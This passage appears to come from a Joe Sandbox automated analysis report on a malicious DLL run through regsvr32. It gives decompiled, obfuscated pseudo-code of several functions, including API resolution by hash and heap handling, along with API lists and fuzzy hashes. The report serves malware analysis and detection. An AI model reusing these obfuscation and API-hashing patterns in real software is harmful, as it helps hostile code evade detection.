                                				_t132 = _t261 - 0xb3d;
                                				_t232 = _t231 + 0x1c8;
                                				r9d = _t261 + 0x612;
                                				 *(_t241 + 0x30) = _t232;
                                				 *(_t241 + 0x28) = __r9;
                                				r8d = r8d + 0x216;
                                				 *(_t241 + 0x20) = _t238;
                                				E00007FFC7FFC130E82D0(0, _t226, _t226); // executed
                                				goto 0x130f803b;
                                				goto 0x130f803b;
                                				_t254 = _t130;
                                				if (_t254 - (( *(_t251 + 0xd8) | r15d) ^ _t132) >= 0) goto 0x130f7ffe;
                                				if (_t254 -  *((intOrPtr*)(_t251 + 0x110)) +  *_t251 >= 0) goto 0x130f7fe6;
                                				SetEndOfFile(_t223);
                                				r9d =  *(__r9 + 0xc8);
                                				r10d =  *(__r9 + 0xf0);
                                				r9d = r9d & _t132;
                                				r10d = r10d ^  *(__r9 + 0x90);
                                				r9d = r9d ^ 0x00003666;
                                				_t222 =  *((intOrPtr*)(__r9 + 0x130));
                                				 *(_t241 + 0x38) = r9d;
                                				r13d = r13d | _t130;
                                				 *(_t241 + 0x30) = _t226 & 0x000027b2;
                                				r10d = r10d - 0x3a59;
                                				 *(_t241 + 0x28) = _t232 & 0x00000008 | 0x000023f6;
                                				 *(_t241 + 0x20) = r10d;
                                				r8d = r13d;
                                				_t122 = E00007FFC7FFC130E8BF0(_t261 - 0xcdf, _t261 + 0xb4 + r14d, _t232 & 0x00000008 | 0x000023f6, __r9, (_t232 & 0x000027b2) +  *(__r9 + 0x120), _t222, _t226, __r9, _t255);
                                				r14d = _t122;
                                				goto 0x130f803b;
                                				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
                                				goto 0x130f803b;
                                				_t253 =  *((intOrPtr*)(__r9 + 0x1f0));
                                				if (_t254 == r8d * _t253 - _t222) goto 0x130f803b;
                                				r8d = r8d * _t122;
                                				if (_t130 != r8d * _t253 - _t222) goto 0x130f8020;
                                				return _t261 - 0xfd2;
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 1146652191-0
                                • Opcode ID: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction ID: 9953ac6f7de0af428f2d765eb6b5b05fb97ad360630c624243fc19e29c606389
                                • Opcode Fuzzy Hash: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction Fuzzy Hash: 65B18672605B998BDB90CF25D894BE937A8F788B98F054036CE4D5B358DF38D661CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 86%
                                			E00007FFC7FFC130FA4A0(void* __rax, void* __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, long long _a104, long long _a120) {
                                				long long _v96;
                                				short _v104;
                                				signed char _t44;
                                				void* _t45;
                                				signed int _t46;
                                				short _t47;
                                				intOrPtr* _t54;
                                				intOrPtr _t62;
                                				intOrPtr _t64;
                                				void* _t80;
                                				intOrPtr _t82;
                                
                                				_t64 = _a96;
                                				r8d = r8d + 4;
                                				_a104 = _a104 + 0xfffffdb4;
                                				r9d = _t64 - 0x30d5;
                                				_a96 = r8d;
                                				_a16 = r9d;
                                				_a120 = _a80 + 0xffffda68;
                                				if (_a120 + 0x18b7 - __rax > 0) goto 0x130fa608;
                                				_t54 = __rdx - 0xea2;
                                				if (_t54 - _t64 + 0xffffee57 <= 0) goto 0x130fa5fa;
                                				_v96 = 0x38e9;
                                				r9d = 0x3666;
                                				_v104 = _t47;
                                				r8d = 0x37e1;
                                				 *((long long*)(_t54 - 0x77)) =  *((long long*)(_t54 - 0x77)) - 1;
                                				 *((intOrPtr*)(_t54 - 0x75)) =  *((intOrPtr*)(_t54 - 0x75)) + _t45;
                                				 *((intOrPtr*)(_t54 - 0x7f)) =  *((intOrPtr*)(_t54 - 0x7f)) + _t45;
                                				asm("int1");
                                				spl = spl ^  *(_t80 - 0x76b80000);
                                				_t62 =  *((intOrPtr*)(_t54 + 1));
                                				 *_t54 =  *_t54 + __r9 + 0x38e9;
                                				_t82 =  *((intOrPtr*)(_t62 + 0x1a0));
                                				_t44 =  *(_t82 + 0xb0) * 0x4b917808;
                                				if (_t54 == 0x2598) goto 0x130fa5bc;
                                				 *(_t62 + 0x1b0) =  *(_t62 + 0x1b0) |  *( *((intOrPtr*)(_t62 + 0x1c0)) + 0x120) ^ 0x00002032;
                                				_t46 =  *(_t82 + 0xb0) * 0x4b917808;
                                				if (_t47 != 0x1f2c) goto 0x130fa590;
                                				 *0xFEF573E841001F5D =  *((intOrPtr*)(0x1f2c +  *((intOrPtr*)(_a88 + 0x13088)) + 0x41000031)) - _t46;
                                				 *0x244489660000361E =  *0x244489660000361E & _t44;
                                				asm("loope 0x39");
                                				 *0x30d5 =  *0x30d5 + _t44;
                                				 *0x2444C7480000305E =  *((long long*)(0x2444c7480000305e)) - 1;
                                				asm("adc dword [eax+0x3], 0x0");
                                				 *0x2444C74800003056 =  *((intOrPtr*)(0x2444c74800003056)) + _t46;
                                				 *0x30d5 =  *0x30d5 & 0x00000001;
                                				 *0x30d5 =  *0x30d5 + _t44;
                                				asm("invalid");
                                				return _t44;
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 457 73a238-73a278 call 7324b0 460 73a27e-73a290 call 73908c 457->460 461 73a3dc-73a3f5 457->461 464 73a292-73a29d 460->464 465 73a29f-73a2a1 460->465 466 73a2a5-73a2c7 HeapAlloc 464->466 465->466 467 73a3ce-73a3d6 HeapFree 466->467 468 73a2cd-73a304 call 7347b0 * 2 call 73908c 466->468 467->461 476 73a306-73a30b 468->476 477 73a30d 468->477 478 73a30f-73a32a call 737cf4 476->478 477->478 481 73a32f-73a341 HeapFree 478->481 481->467 482 73a347-73a378 call 7352b8 481->482 485 73a37a-73a381 482->485 486 73a389-73a391 482->486 485->486 487 73a383-73a387 485->487 488 73a393-73a39e call 737500 486->488 489 73a3b0-73a3c8 HeapFree * 2 486->489 487->485 487->486 492 73a3a0-73a3a3 488->492 493 73a3a5-73a3ad 488->493 489->467 492->489 493->489
                                C-Code - Quality: 24%
                                			E0073A238(void* __ecx, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                                				char _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				intOrPtr _t40;
                                				void* _t41;
                                				void* _t43;
                                				void* _t49;
                                				char _t50;
                                				intOrPtr _t60;
                                				long long* _t77;
                                				long long _t78;
                                				long long _t79;
                                				void* _t91;
                                				intOrPtr _t103;
                                				void* _t104;
                                				intOrPtr _t106;
                                				void* _t107;
                                				long long* _t109;
                                				intOrPtr _t111;
                                				long long* _t113;
                                				long long* _t119;
                                				void* _t129;
                                
                                				_t79 = __rbx;
                                				_t77 = _t113;
                                				 *((long long*)(_t77 + 8)) = __rbx;
                                				 *((long long*)(_t77 + 0x18)) = __r8;
                                				_push(_t107);
                                				_push(_t104);
                                				_t126 =  *0x73d458;
                                				_t3 = _t77 + 0x20; // 0xfb849fa7
                                				_t111 =  *((intOrPtr*)( *0x73d458 + 8));
                                				_t129 = __rcx;
                                				_t49 = 8; // executed
                                				E007324B0(8, __ecx, __eflags, __rbx, _t3, _t107); // executed
                                				if(_t77 == 0) {
                                					L18:
                                					return _t49;
                                				}
                                				E0073908C(0xfb849f8f, _t77,  *((intOrPtr*)(_t126 + 0x18)));
                                				if(_t77 == 0) {
                                					__eflags = 0;
                                					_v88 = 0;
                                				} else {
                                					_v88 =  *_t77();
                                				}
                                				_t10 = _t77 + 1; // 0x1
                                				r8d = _t104 + _t10;
                                				HeapAlloc(??, ??, ??);
                                				_t109 = _t77;
                                				_v80 = _t77;
                                				if(_t77 == 0) {
                                					L17:
                                					HeapFree();
                                					goto L18;
                                				} else {
                                					_t50 = _a32;
                                					L007347B0();
                                					_t13 = _t104 + 1; // 0x1
                                					r8d = _t13;
                                					L007347B0();
                                					E0073908C(0xfb849f8f, _t77,  *((intOrPtr*)(_t126 + 0x18)));
                                					if(_t77 == 0) {
                                						_t40 = 0;
                                						__eflags = 0;
                                					} else {
                                						_t40 =  *_t77();
                                					}
                                					_t16 =  &_a32; // 0xfb84a007
                                					_t17 =  &_v72; // 0xfb849f9f
                                					r8d = _t40;
                                					_v104 = _t16;
                                					_t41 = E00737CF4(_t50, _t77, _t79, _t129, _t109, _t111, _t17); // executed
                                					_t119 = _t109;
                                					_t49 = _t41;
                                					HeapFree(??, ??, ??);
                                					if(_t49 != 0) {
                                						goto L17;
                                					} else {
                                						r8d = _a32;
                                						_t103 = _v72;
                                						_t21 =  &_v88; // 0xfb849f8f
                                						_t78 = _t21;
                                						_t22 =  &_v80; // 0xfb849f87
                                						_t91 = _t129;
                                						_v104 = _t78;
                                						_t43 = E007352B8(_t79, _t103, _t109, _t111, _t119, _t22);
                                						_t52 = _v88;
                                						_t106 = _v80;
                                						_t49 = _t43;
                                						if(_v88 == 0) {
                                							L12:
                                							 *((char*)(_t78 + _t106)) = 0;
                                							if(_t49 == 0) {
                                								E00737500(_t49, _t52, _t79, _t106, _t103, _t106, _t109, _t111);
                                								if(_t78 != 0) {
                                									 *_a24 = _t78;
                                								} else {
                                									_t29 = _t78 + 8; // 0x8
                                									_t49 = _t29;
                                								}
                                							}
                                							HeapFree();
                                							HeapFree(??, ??, ??);
                                							goto L17;
                                						} else {
                                							goto L10;
                                						}
                                						while(1) {
                                							L10:
                                							_t60 = _t91 - 1;
                                							if( *((char*)(_t103 + _t106)) != 0x3d) {
                                								goto L12;
                                							}
                                							_t52 = _t60;
                                							if(_t60 != 0) {
                                								continue;
                                							}
                                							goto L12;
                                						}
                                						goto L12;
                                					}
                                				}
                                			}






























                                APIs
                                  • Part of subcall function 007324B0: HeapAlloc.KERNEL32 ref: 00732572
                                  • Part of subcall function 007324B0: HeapFree.KERNEL32 ref: 007325A9
                                  • Part of subcall function 007324B0: HeapFree.KERNEL32 ref: 007325B7
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 0073A2B6
                                • HeapFree.KERNEL32 ref: 0073A339
                                • HeapFree.KERNEL32 ref: 0073A3B8
                                • HeapFree.KERNEL32 ref: 0073A3C8
                                • HeapFree.KERNEL32 ref: 0073A3D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 4981db4443c45dff49b96d5be61638d8b411d84e5456f2ddc4787e3a3e33d027
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: 6E418132709B859AFB59DB56A84476AB7A1FBC9BC4F048025AE8E43706EF3CD505C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 494 732dc4-732e1a call 734320 497 732e29-732e2e 494->497 498 732e1c-732e27 494->498 499 732e34-732e50 call 734880 497->499 498->499 502 732e56-732e6c 499->502 503 732f94-732f9a 499->503 506 732e6e-732e88 502->506 507 732e8d-732ece call 731bfc 502->507 504 732fc2 503->504 505 732f9c-732faa call 7347b8 503->505 510 732fc7 504->510 516 732faf-732fb1 505->516 506->507 511 732ed3-732ee8 HeapFree 507->511 513 732fcd-732fd1 510->513 514 732f01-732f03 511->514 515 732eea-732eec 511->515 517 732fd3-732fe4 call 73908c 513->517 518 73302f-733032 513->518 514->503 522 732f09-732f46 call 736c1c call 737b6c 514->522 519 732ef6-732efc call 73a3f8 515->519 520 732eee-732ef4 515->520 516->513 521 732fb3-732fc0 516->521 533 732fe6 517->533 534 732fed-732ff0 517->534 523 733034-733044 HeapFree 518->523 524 73308e-7330a0 518->524 519->514 520->514 520->519 521->513 545 732f71-732f92 HeapFree call 7347b8 522->545 546 732f48-732f6d 522->546 528 733046-73304c 523->528 529 73304e-73305f call 73908c 523->529 528->524 528->529 541 733061 529->541 542 733067-733086 call 73908c 529->542 533->534 535 732ff2-732ffb 534->535 536 73301c-73302b 534->536 535->536 539 732ffd-73300d call 7347b8 535->539 536->518 539->536 553 73300f-733017 539->553 541->542 542->524 552 733088 542->552 545->516 546->513 550 732f6f 546->550 550->510 552->524 553->536
                                C-Code - Quality: 32%
                                			E00732DC4(void* __ebx, void* __edx, void* __ebp, void* __rcx, long long __rdx, long long __r8, void* __r9, signed int _a8, signed long long _a16, signed int* _a24, signed int _a32) {
                                				intOrPtr _v88;
                                				void* _v96;
                                				signed int _v104;
                                				signed long long _v112;
                                				signed int _v120;
                                				long long _v128;
                                				signed long long _v136;
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t71;
                                				void* _t82;
                                				void* _t87;
                                				signed int _t89;
                                				void* _t90;
                                				signed int _t94;
                                				void* _t95;
                                				void* _t96;
                                				signed int _t97;
                                				void* _t113;
                                				signed long long _t134;
                                				void* _t137;
                                				void* _t164;
                                				signed int _t166;
                                				void* _t168;
                                				void* _t170;
                                				void* _t182;
                                				void* _t183;
                                				signed int* _t187;
                                				signed int _t188;
                                				signed long long _t194;
                                
                                				_t113 = __ebp;
                                				_t95 = __ebx;
                                				_t183 = _t170;
                                				 *((long long*)(_t183 + 0x18)) = __r8;
                                				 *((long long*)(_t183 + 0x10)) = __rdx;
                                				_push(_t137);
                                				_push(_t168);
                                				_push(_t166);
                                				_push(_t194);
                                				_t192 =  *0x73d458;
                                				 *(_t183 + 0x20) =  *(_t183 + 0x20) & 0x00000000;
                                				_t164 = __rcx;
                                				_t98 =  *0x73d450;
                                				_t134 =  *((intOrPtr*)( *0x73d458 + 8));
                                				_v120 =  *0x73d450;
                                				r15d = 0;
                                				 *(_t183 - 0x60) =  *(_t183 - 0x60) & _t194;
                                				_v112 = _t134;
                                				if(E00734320( *0x73d450, _t137, __rcx, _t183 - 0x68, __rcx, _t166, _t183 + 8, __r9) == 0) {
                                					_t166 = _v104;
                                					r12d = 2;
                                				} else {
                                					_t12 = _t194 + 1; // 0x1
                                					r12d = _t12;
                                					_v104 = _t166;
                                				}
                                				_t15 =  &_a32; // 0xca
                                				_t181 = _t15;
                                				_t175 =  &_v96;
                                				_t71 = E00734880(_t95, r12d, _t113, _t134, _t137, _t164,  &_v96, _t15);
                                				_t96 = _t71;
                                				if(_t71 != 0) {
                                					L15:
                                					if(_t96 == 0x10d2) {
                                						goto L20;
                                					}
                                					_t48 = _t164 + 0xc0; // 0xc0
                                					_t82 = E007347B8(_t96, _t98, _t134, _t137, _t48, _t168);
                                					goto L17;
                                				} else {
                                					r8d = _a32;
                                					r13d = r8d;
                                					r13d = r13d - r12d;
                                					_t187 = _v96;
                                					if(_t166 != 0) {
                                						_t94 = _a8;
                                						_t187[0xa] = 1;
                                						_t187[0x12] = _t166;
                                						_t187[0xd] = _t94;
                                						_t187[0x10] = _t94;
                                					}
                                					_t25 = _t164 + 0xc0; // 0xc0
                                					r9d = 0;
                                					 *_t187 = _v120 ^ 0x62ade362;
                                					_t187[3] =  *(_t164 + 0x48);
                                					_t187[2] =  *(_t164 + 0x4c);
                                					_t30 =  &_a8; // 0xb2
                                					_v128 = _t30;
                                					_t32 =  &_v120; // 0x32
                                					_t134 = _t32;
                                					_v136 = _t134;
                                					_t87 = E00731BFC(_t98, _t134, _t137, _t25, _t187, _t175, _t181, _t183); // executed
                                					_t96 = _t87;
                                					HeapFree(??, ??, ??);
                                					if(r13d != 0 && (_t96 == 0 || _t96 == 0x10d2)) {
                                						E0073A3F8(r13d, _t134, _t137, _t164, _t166, _t168);
                                					}
                                					if(_t96 != 0) {
                                						goto L15;
                                					}
                                					_t97 = _a8;
                                					_t188 = _v120;
                                					r13d =  *(_t164 + 0x4c);
                                					_t89 = E00736C1C(_t97, _t188);
                                					_t38 =  &_a8; // 0xb2
                                					r9d = 1;
                                					 *(_t164 + 0x48) = _t97;
                                					 *(_t164 + 0x4c) = _t89;
                                					_t90 = E00737B6C(_t97, _t98, _t137, _t164, _t188, _t166, _t168, _t38, _t182, _t183);
                                					_t96 = _t90;
                                					if(_t90 != 0) {
                                						HeapFree();
                                						_t47 = _t164 + 0xc0; // 0xc0
                                						_t82 = E007347B8(_t96, _t98, _t134, _t137, _t47, _t168);
                                						L17:
                                						if(_t82 == 0) {
                                							asm("lock or dword [edi+0xec], 0x1");
                                							_t166 = _v104;
                                						}
                                						L21:
                                						if( *((intOrPtr*)(_t164 + 0x60)) != 0) {
                                							E0073908C(0x9c66d81c, _t134,  *((intOrPtr*)(_t192 + 0x18)));
                                							if(_t134 != 0) {
                                								 *_t134();
                                							}
                                							if(r15d != 0) {
                                								_t134 =  *(_t164 + 0x58);
                                								if(_v88 > _t134) {
                                									_t57 = _t164 + 0xc0; // 0xc1
                                									if(E007347B8(_t96, _t98, _t134, _t137, _t57, _t168) == 0) {
                                										asm("lock or dword [edi+0xec], 0x1");
                                										_t166 = _v104;
                                									}
                                								}
                                							}
                                							_t134 = _t134 * 0x23c34600 + _v88;
                                							 *(_t164 + 0x58) = _t134;
                                						}
                                						if(_t166 != 0) {
                                							HeapFree();
                                							if(_t96 == 0 || _t96 == 0x10d2) {
                                								E0073908C(0x4a75e5e7, _t134,  *((intOrPtr*)(_t192 + 0x10)));
                                								if(_t134 != 0) {
                                									 *_t134();
                                								}
                                								 *(_t164 + 0x98) =  *(_t164 + 0x98) & 0x00000000;
                                								 *(_t164 + 0x9c) =  *(_t164 + 0x9c) & 0x00000000;
                                								E0073908C(0x8d72aad2, _t134,  *((intOrPtr*)(_t192 + 0x10)));
                                								if(_t134 != 0) {
                                									 *_t134();
                                								}
                                							}
                                						}
                                						return _t96;
                                					}
                                					_t134 = _a16;
                                					 *_t134 = _t188;
                                					 *_a24 = _a8;
                                					if( *(_t164 + 0x4c) != r13d) {
                                						goto L21;
                                					}
                                					L20:
                                					r15d = 1;
                                					goto L21;
                                				}
                                			}




































                                APIs
                                  • Part of subcall function 00734320: HeapAlloc.KERNEL32 ref: 00734381
                                • HeapFree.KERNEL32 ref: 00732EDF
                                • HeapFree.KERNEL32 ref: 00732F7E
                                • HeapFree.KERNEL32 ref: 0073303C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: d1e8ee5a8e2d5df2107bf18b2760293ac0e9f599405a1bc497db24dd6abd22c0
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: C271AE72704B81D7EB28DB22E548B9AB3A5F788B84F404025EF4947B16DF3DD966CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 46%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				intOrPtr _t74;
                                				void* _t77;
                                				void* _t85;
                                				void* _t98;
                                				signed long long _t110;
                                				signed long long _t111;
                                				signed long long _t113;
                                				long long _t116;
                                				void* _t117;
                                				signed long long _t121;
                                				long long _t138;
                                				long long _t142;
                                				signed long long _t148;
                                				void* _t149;
                                				void* _t155;
                                				signed long long _t157;
                                				void* _t158;
                                				void* _t161;
                                				void* _t163;
                                				void* _t164;
                                				void* _t166;
                                				long long _t168;
                                				void* _t169;
                                
                                				r13d =  *(_t158 + 0x100);
                                				r10d = __r8 - 0x30d5;
                                				r12d =  *(_t158 + 0x108);
                                				r8d = __rcx - 0x1408;
                                				r13d = r13d + 0xffffda68;
                                				 *(_t158 + 0x100) = r10d;
                                				_t168 = __rdx;
                                				 *(_t158 + 0x108) = r8d;
                                				_t155 = __rcx + 0x61f;
                                				r9d = r9d + 0xffffeb0d;
                                				_t138 =  *((intOrPtr*)(_t158 + 0xf0)) + 0xffffd84e;
                                				 *((intOrPtr*)(_t158 + 0xd0)) = r9d;
                                				_t148 =  *((intOrPtr*)(_t158 + 0xe8)) + 0x14c1;
                                				 *((long long*)(_t158 + 0xe8)) = _t138;
                                				r12d = r12d + 0xffffdc0a;
                                				r15d = r13d;
                                				if (_t138 - _t98 >= 0) goto 0x130e2d94;
                                				if (_t138 - _t98 >= 0) goto 0x130e2d94;
                                				if (_t155 == _t148 - 0x3f3) goto 0x130e2d94;
                                				_t74 = _t166 + 0x1f2c;
                                				 *((long long*)(_t158 + 0xc8)) = __rbx;
                                				if (r12d - _t74 > 0) goto 0x130e2c16;
                                				r9d = __r10 + 0x2598;
                                				_t121 =  *((intOrPtr*)(__rdx + 0x1e0));
                                				r10d = _t155 - 0x984;
                                				r11d = _t148 - 0x1956;
                                				_t116 = _t149 + 0x4ca;
                                				r8d = _t164 + 0x2103;
                                				 *((intOrPtr*)(__rdx + 0x68)) = _t74;
                                				 *(__rdx + 0xa0) = _t121 | 0x00002598;
                                				 *((long long*)(_t158 + 0x60)) = _t148 - 0x12ab;
                                				 *(_t158 + 0x58) = r10d;
                                				 *((intOrPtr*)(_t158 + 0x50)) = r9d;
                                				 *((intOrPtr*)(_t158 + 0x48)) = r11d;
                                				 *((long long*)(_t158 + 0x40)) = _t116;
                                				 *((long long*)(__rdx + 0x1e0)) = _t121 -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1c0)) + 0x198)) - 0x3a59;
                                				 *(_t158 + 0x38) = _t148;
                                				 *((long long*)(_t158 + 0x30)) =  *(_t158 + 0x100) + 0x38e9;
                                				 *((long long*)(_t158 + 0x28)) = __rdx;
                                				 *((long long*)(_t158 + 0x20)) = _t155 + 0xffffeb3f;
                                				E00007FFC7FFC130FD5F0(_t85, _t148 - 0x12ab,  *((intOrPtr*)(_t158 + 0xe8)) + 0x30d5,  *((intOrPtr*)(_t158 + 0xe0)) + 0x3f3, __r8, _t161, _t163, _t166, __rdx, _t169); // executed
                                				goto 0x130e2d8c;
                                				_t142 = r13d;
                                				_t157 = r12d;
                                				 *((long long*)(_t158 + 0x70)) = _t142;
                                				if (_t142 - _t157 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
                                				GetProcessHeap();
                                				_t117 = _t116 + 4;
                                				if (r13d - _t157 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
                                				r13d = r15d;
                                				r8d =  *(_t158 + 0x108);
                                				r9d =  *((intOrPtr*)(_t158 + 0xd0));
                                				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
                                				_t110 = r9d;
                                				if ( *((intOrPtr*)(_t158 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + _t110 > 0) goto 0x130e2d8c;
                                				_t77 = _t148 + _t169;
                                				_t111 = _t110 | _t148;
                                				if (_t117 - _t111 > 0) goto 0x130e2d8c;
                                				asm("o16 nop [eax+eax]");
                                				 *(_t158 + 0x58) = 0x2743;
                                				_push(_t111);
                                				asm("loope 0x2f");
                                				 *_t111 =  *_t111 + _t77;
                                				asm("dec eax");
                                				 *_t111 =  *_t111 + _t77;
                                				r9d = 0x1ff4;
                                				 *((long long*)(_t158 + 0x40)) = 0x2e2f;
                                				r8d = 0x1c0c;
                                				 *(_t158 + 0x38) = 0x26f1;
                                				 *((long long*)(_t158 + 0x30)) = 0x1000;
                                				 *((long long*)(_t158 + 0x28)) = 0x1acd;
                                				 *((long long*)(_t158 + 0x20)) = 0x1f1c;
                                				 *0x13124160 = E00007FFC7FFC130FF8F0( *((intOrPtr*)(__rdx + 0x78)), __r8 - 0x11a9, _t117 - _t111, 0x103, 0x34b0, __r8 - 0x000011a9 & 0x00003189, _t161, _t163);
                                				r15d = r15d ^ r13d &  *(_t168 + 0x188);
                                				_t113 = r8d |  *(_t168 + 0xd8);
                                				 *(_t168 + 0xb0) = _t113;
                                				if (_t117 + 3 - (_t113 | _t148) <= 0) goto 0x130e2cf0;
                                				return _t169 + 0x1f2c;
                                			}

                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
